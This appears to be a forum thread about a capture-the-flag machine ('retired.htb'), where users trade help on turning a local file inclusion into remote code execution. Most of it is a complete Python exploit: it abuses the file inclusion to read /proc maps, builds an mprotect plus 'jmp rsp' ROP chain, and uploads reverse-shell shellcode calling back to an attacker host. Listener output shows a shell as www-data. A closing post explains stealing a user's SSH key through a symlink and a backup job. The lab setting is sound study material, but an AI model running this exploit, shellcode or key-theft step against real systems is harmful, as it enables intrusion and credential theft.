Posts: 23 Threads: 0 Joined: N/A April 15, 2022 at 11:40 PM Hi, I am stuck at the step from the LFI to RCE. Can anyone help me, please?
(April 3, 2022, 12:48 PM)Internetdreams Wrote: Trying to reverse that accept_licence — how? Posts: 15 Threads: 0 Joined: N/A April 20, 2022 at 10:17 AM Can someone explain how to make this BOF work, please? :(( I found the SSH password for the dev user on this forum, but I want to see how to exploit that process, activate_license, please.
PS. I'm kind of a noob with BOF stuff. Posts: 15 Threads: 0 Joined: N/A April 21, 2022 at 5:29 AM @skyweasel @mrfart You can call mprotect() to make the entire stack executable and then return into a `jmp rsp` gadget, so execution lands in the reverse-shell shellcode placed right after the ROP chain (mprotect is needed when the stack is non-executable, which is presumably why plain shellcode on the stack does not run here). There are more libraries mapped than just libc; the other ones can give you gadgets that libc does not have. Posts: 15 Threads: 0 Joined: N/A April 23, 2022 at 8:54 AM Does anyone have a write-up on the binary exploitation part? Posts: 15 Threads: 0 Joined: N/A April 23, 2022 at 8:52 PM Well, I tried this but had no luck; if we don't know which function is vulnerable, we can't do anything.
https://masterccc.github.io/memo/rop_example/ Posts: 15 Threads: 0 Joined: N/A April 28, 2022 at 12:16 AM Can someone explain how to proceed further with this BOF, please? In the kernel log I get: Apr 27 20:09:47 debian kernel: [11674.449460] activate_licens[19618]: segfault at 424242424242 ip 0000424242424242 sp 00007fffffffe1b0 error 14 in activate_license[555555554000+1000] Apr 27 20:09:47 debian kernel: [11674.449468] Code: Unable to access opcode bytes at RIP 0x424242424218. (What this log already tells you: `ip 0000424242424242` is the six 'B' bytes of the payload, so RIP is fully controlled and the saved return address sits 520 bytes into the uploaded file. Six bytes rather than eight because x86-64 user addresses are 48-bit: an 8-byte 0x4242424242424242 is non-canonical and the `ret` itself faults before RIP ever shows the value. `error 14` is a user-mode instruction fetch from an unmapped page, and `activate_license[555555554000+1000]` is the classic no-ASLR PIE load address seen under a debugger, so symbol offsets from a local copy of the binary only become usable once you have the live base from /proc/<pid>/maps.)
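#!/usr/bin/env python3
"""Crash-only proof of RIP control for activate_license (forum attempt, April 28, 2022).

Uploads a licence file of OFFSET filler bytes followed by JUNK 0x42 bytes and lets the
target's kernel log confirm the overwrite (``ip 0000424242424242``). This script does not
exploit anything yet: it only establishes the offset to the saved return address.
"""
from pwn import *
import requests

context.arch = 'amd64'
context.os = 'linux'
context.endian = 'little'
context.word_size = 64

TARGET = 'http://192.168.122.127/activate_license.php'
OFFSET = 520   # bytes of filler before the saved return address
JUNK = 6       # 6 (not 8) bytes of 'B': x86-64 user addresses are 48-bit, so an 8-byte
               # 0x4242424242424242 is non-canonical and faults at the `ret` itself without
               # ever appearing in RIP; 6 bytes give the visible ip=0x424242424242.

# The local copy is only useful for offsets: the 0x555555554000 base in the kernel log is the
# classic no-ASLR PIE load address, so binary.symbols['main'] is a file-relative offset, not a
# live address. The live base has to be read from /proc/<pid>/maps through the LFI before any
# symbol or gadget from this file can be used.
#proc = process(["./activate_license", "1337"])
binary = ELF("./activate_license", checksec=False)
main_off = binary.symbols['main']
log.info("main is at offset %#x inside the PIE image (needs a live base to be usable)", main_off)


def build_crash_payload(offset: int = OFFSET, junk: int = JUNK) -> bytes:
    """Return *offset* filler bytes followed by *junk* 0x42 bytes (the RIP overwrite)."""
    return b"A" * offset + b"B" * junk


def send_license(url: str, payload: bytes) -> requests.Response:
    """POST *payload* as the multipart field 'licensefile' that activate_license.php consumes.

    The octet-stream content type keeps the server from touching the bytes; a timeout is
    set so a hung (crashed) backend does not block the script forever.
    """
    datafile = {'licensefile': ("key.txt", payload, 'application/octet-stream')}
    headers = {
        "Accept": "application/octet-stream",
        "Accept-Encoding": "gzip, deflate",
        "Connection": "close",
        "Upgrade-Insecure-Requests": "1",
    }
    return requests.post(url, files=datafile, headers=headers, timeout=10)


if __name__ == "__main__":
    resp = send_license(TARGET, build_crash_payload())
    log.info("server answered HTTP %d; check the target's kernel log for ip=0x424242424242",
             resp.status_code)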
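#!/usr/bin/env python3
"""LFI -> stack BOF -> RCE for activate_license (josepoo, April 28, 2022, 8:17 PM).

"You just need to add the ROP chain: mprotect + jmp rsp + shellcode. Full script:"

How it works:
  1. The LFI in index.php?page= reads /proc/sched_debug to find the PID of the running
     activate_license daemon, then /proc/<pid>/maps for the live base of libc, libsqlite3
     and the [stack] mapping. This is how PIE/ASLR is defeated: no leak from the binary.
  2. The same LFI downloads the exact libc / libsqlite3 images so gadget offsets match.
  3. The licence upload overflows a buffer 520 bytes below the saved return address; the
     ROP chain calls mprotect(stack_base, stack_size, RWX) and returns into a `jmp rsp`
     gadget, which lands in the reverse-shell shellcode appended right after the chain
     (after the `ret` into the gadget, rsp already points at the shellcode).

Assumption (not verifiable from here): the daemon's address space is the same when the
overflow hits as when /proc/<pid>/maps was read -- true if it handles the upload in the
same process or a fork()ed child, false if it were re-exec'd per request.

Usage: exploit.py LHOST LPORT [TARGET]

Reply (nobushk, April 29, 2022, quoting this script): "wow thank you so much :D now time to
try understand what that code make.."
"""
import re
import socket
import struct
import sys
import tempfile
from pathlib import Path

import requests
from pwn import *

IP = "10.10.11.154"
OFFSET = 520                 # filler bytes before the saved return address
LFI = "/index.php?page="
ELF_MAGIC = b"\x7fELF"
PROT_RWX = 7                 # PROT_READ | PROT_WRITE | PROT_EXEC


def usage():
    """Print the argument list and exit non-zero (the forum ate the original <LHOST> <LPORT>)."""
    print(f"Usage: {sys.argv[0]} LHOST LPORT [TARGET]")
    sys.exit(1)


def lfi_read(path, target=IP):
    """Return the raw bytes of *path* on *target* via the LFI, or None on a non-200 reply."""
    r = requests.get(f"http://{target}{LFI}{path}", allow_redirects=False, timeout=15)
    if r.status_code != 200:
        return None
    return r.content


def get_file(path, target=IP):
    """Download *path* through the LFI into a fresh private temp dir; return the local path.

    Aborts unless the reply starts with the ELF magic: a failed include would otherwise be
    handed to pwntools as a library and yield nonsense gadget addresses. A mkdtemp() dir is
    used instead of a fixed /tmp/<name> so another local user cannot pre-plant the file.
    """
    data = lfi_read(path, target)
    if data is None or not data.startswith(ELF_MAGIC):
        print(f"[-] LFI did not return an ELF image for {path}")
        sys.exit(1)
    lpath = Path(tempfile.mkdtemp(prefix="retired-")) / Path(path).name
    lpath.write_bytes(data)
    return str(lpath)


def get_pid(target=IP):
    """Return the PID of the activate_license daemon as a string, or None if it is not listed.

    /proc/sched_debug prints each task's comm, which the kernel truncates to 15 characters
    ("activate_licens", as also seen in the segfault log), hence the shortened pattern.
    Returning None (instead of crashing on a missing match) makes main()'s check reachable.
    """
    data = lfi_read("/proc/sched_debug", target)
    if data is None:
        return None
    m = re.search(rb"activate_licens\s+([0-9]+)", data)
    if m is None:
        return None
    pid = m.group(1).decode()
    print(f"[+] activate_license running @ PID {pid}")
    return pid


def _find_mapping(maps, name_re):
    """Return (start, end, path) of the first mapping whose path column matches *name_re*.

    /proc/<pid>/maps is sorted by address, so the first hit for a library is its load base.
    """
    for line in maps.splitlines():
        fields = line.split()
        if len(fields) < 6:        # anonymous mapping, no path column
            continue
        path = fields[5]
        if re.search(name_re, path):
            start, end = (int(x, 16) for x in fields[0].split("-"))
            return start, end, path
    print(f"[-] no mapping matching {name_re} in /proc/<pid>/maps")
    sys.exit(1)


def get_addresses(pid, target=IP):
    """Return (libc_base, libc_path, libsqlite_base, libsqlite_path, stack_base, stack_end).

    Libraries are matched on "/libc." or "/libc-" and "/libsqlite3" rather than a bare
    "libc" substring, which would also hit libcrypt / libcrypto if they are mapped first.
    """
    data = lfi_read(f"/proc/{pid}/maps", target)
    if data is None:
        print(f"[-] could not read /proc/{pid}/maps through the LFI")
        sys.exit(1)
    maps = data.decode(errors="replace")
    libc_base, _, libc_path = _find_mapping(maps, r"/libc[.-]")
    libsqlite_base, _, libsqlite_path = _find_mapping(maps, r"/libsqlite3")
    stack_base, stack_end, _ = _find_mapping(maps, r"^\[stack\]$")
    return libc_base, libc_path, libsqlite_base, libsqlite_path, stack_base, stack_end


def reverse_shell(ip, port):
    """x86-64 linux/x64/shell_reverse_tcp (msfvenom -f py) with LHOST/LPORT patched in.

    *ip* is the 4-byte inet_aton() form and *port* the 2-byte big-endian form, i.e. exactly
    the sockaddr_in layout the shellcode builds with `movabs rcx, ...; push rcx`.
    """
    shellcode = b""
    shellcode += b"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48"
    shellcode += b"\x97\x48\xb9\x02\x00" + port + ip + b"\x51\x48"
    shellcode += b"\x89\xe6\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e"
    shellcode += b"\x48\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x6a\x3b\x58"
    shellcode += b"\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00\x53\x48"
    shellcode += b"\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05"
    return shellcode


def main():
    """Resolve the live layout through the LFI, build the chain and upload it."""
    if len(sys.argv) < 3:
        usage()
    target = sys.argv[3] if len(sys.argv) > 3 else IP
    try:
        ip = socket.inet_aton(sys.argv[1])
        port = struct.pack(">H", int(sys.argv[2]))
    except (OSError, ValueError, struct.error):
        print("[-] Invalid arguments")
        usage()

    shellcode = reverse_shell(ip, port)

    # Locate the daemon with the LFI, then its mappings.
    pid = get_pid(target)
    if not pid:
        print("[-] Could not find PID for activate_license")
        sys.exit(1)
    (libc_base, libc_path, libsqlite_base, libsqlite_path,
     stack_base, stack_end) = get_addresses(pid, target)
    # Whole [stack] mapping (0x21000 on the box); page-aligned, as mprotect requires.
    stack_size = stack_end - stack_base

    context.clear(arch="amd64")
    libc = ELF(get_file(libc_path, target), checksec=False)
    libc.address = libc_base
    libsql = ELF(get_file(libsqlite_path, target), checksec=False)
    libsql.address = libsqlite_base

    # Gadgets: pop rdi/rsi/rdx come from libc, `jmp rsp` from libsqlite3
    # (ropper -f libsqlite3.so.0.8.6 --search "jmp rsp" found 0xd431d on the box).
    rop = ROP([libc, libsql])
    mprotect = libc.symbols["mprotect"]
    pop_rdi = rop.rdi[0]
    pop_rsi = rop.rsi[0]
    pop_rdx = rop.rdx[0]
    jmp_rsp = rop.jmp_rsp[0]

    # int mprotect(void *addr, size_t len, int prot); then jmp rsp -> shellcode.
    chain = b"".join(p64(x) for x in (
        pop_rdi, stack_base,
        pop_rsi, stack_size,
        pop_rdx, PROT_RWX,
        mprotect,
        jmp_rsp,
    ))
    payload = b"A" * OFFSET + chain + shellcode

    r = requests.post(f"http://{target}/activate_license.php",
                      files={"licensefile": payload}, timeout=15)
    print(f"[*] upload returned HTTP {r.status_code}; check your listener")


if __name__ == "__main__":
    main()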
Thanks again — I also learned about /proc/<pid>/maps. [code]listening on [any] 9001 ...
connect to [10.10.14.229] from retired.htb [10.10.11.154] 60308
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)[/code] Posts: 24 Threads: 0 Joined: N/A Can anyone explain the lateral movement from www-data to dev? :( Posts: 43 Threads: 0 Joined: N/A [quote="nobushk" pid="43818" dateline="1651225209"][quote="josepoo" pid="43246" dateline="1651177047"](josepoo's mprotect + jmp rsp + shellcode script, quoted in full above)[/quote](nobushk's reply and listener output, quoted above)[/quote] dev runs "/usr/bin/webbackup", which takes a backup of the web directory and saves the zip file in "/var/www/". Create a symlink to dev's SSH key inside "/var/www/html", wait for the next backup run, copy the new zip file to /dev/shm and unzip it: you will find dev's SSH key under the extracted var/www/html/ path. This works because the backup job runs as dev (so it can read the key) and zip follows symlinks by default, archiving the target's contents. Hope this helped :)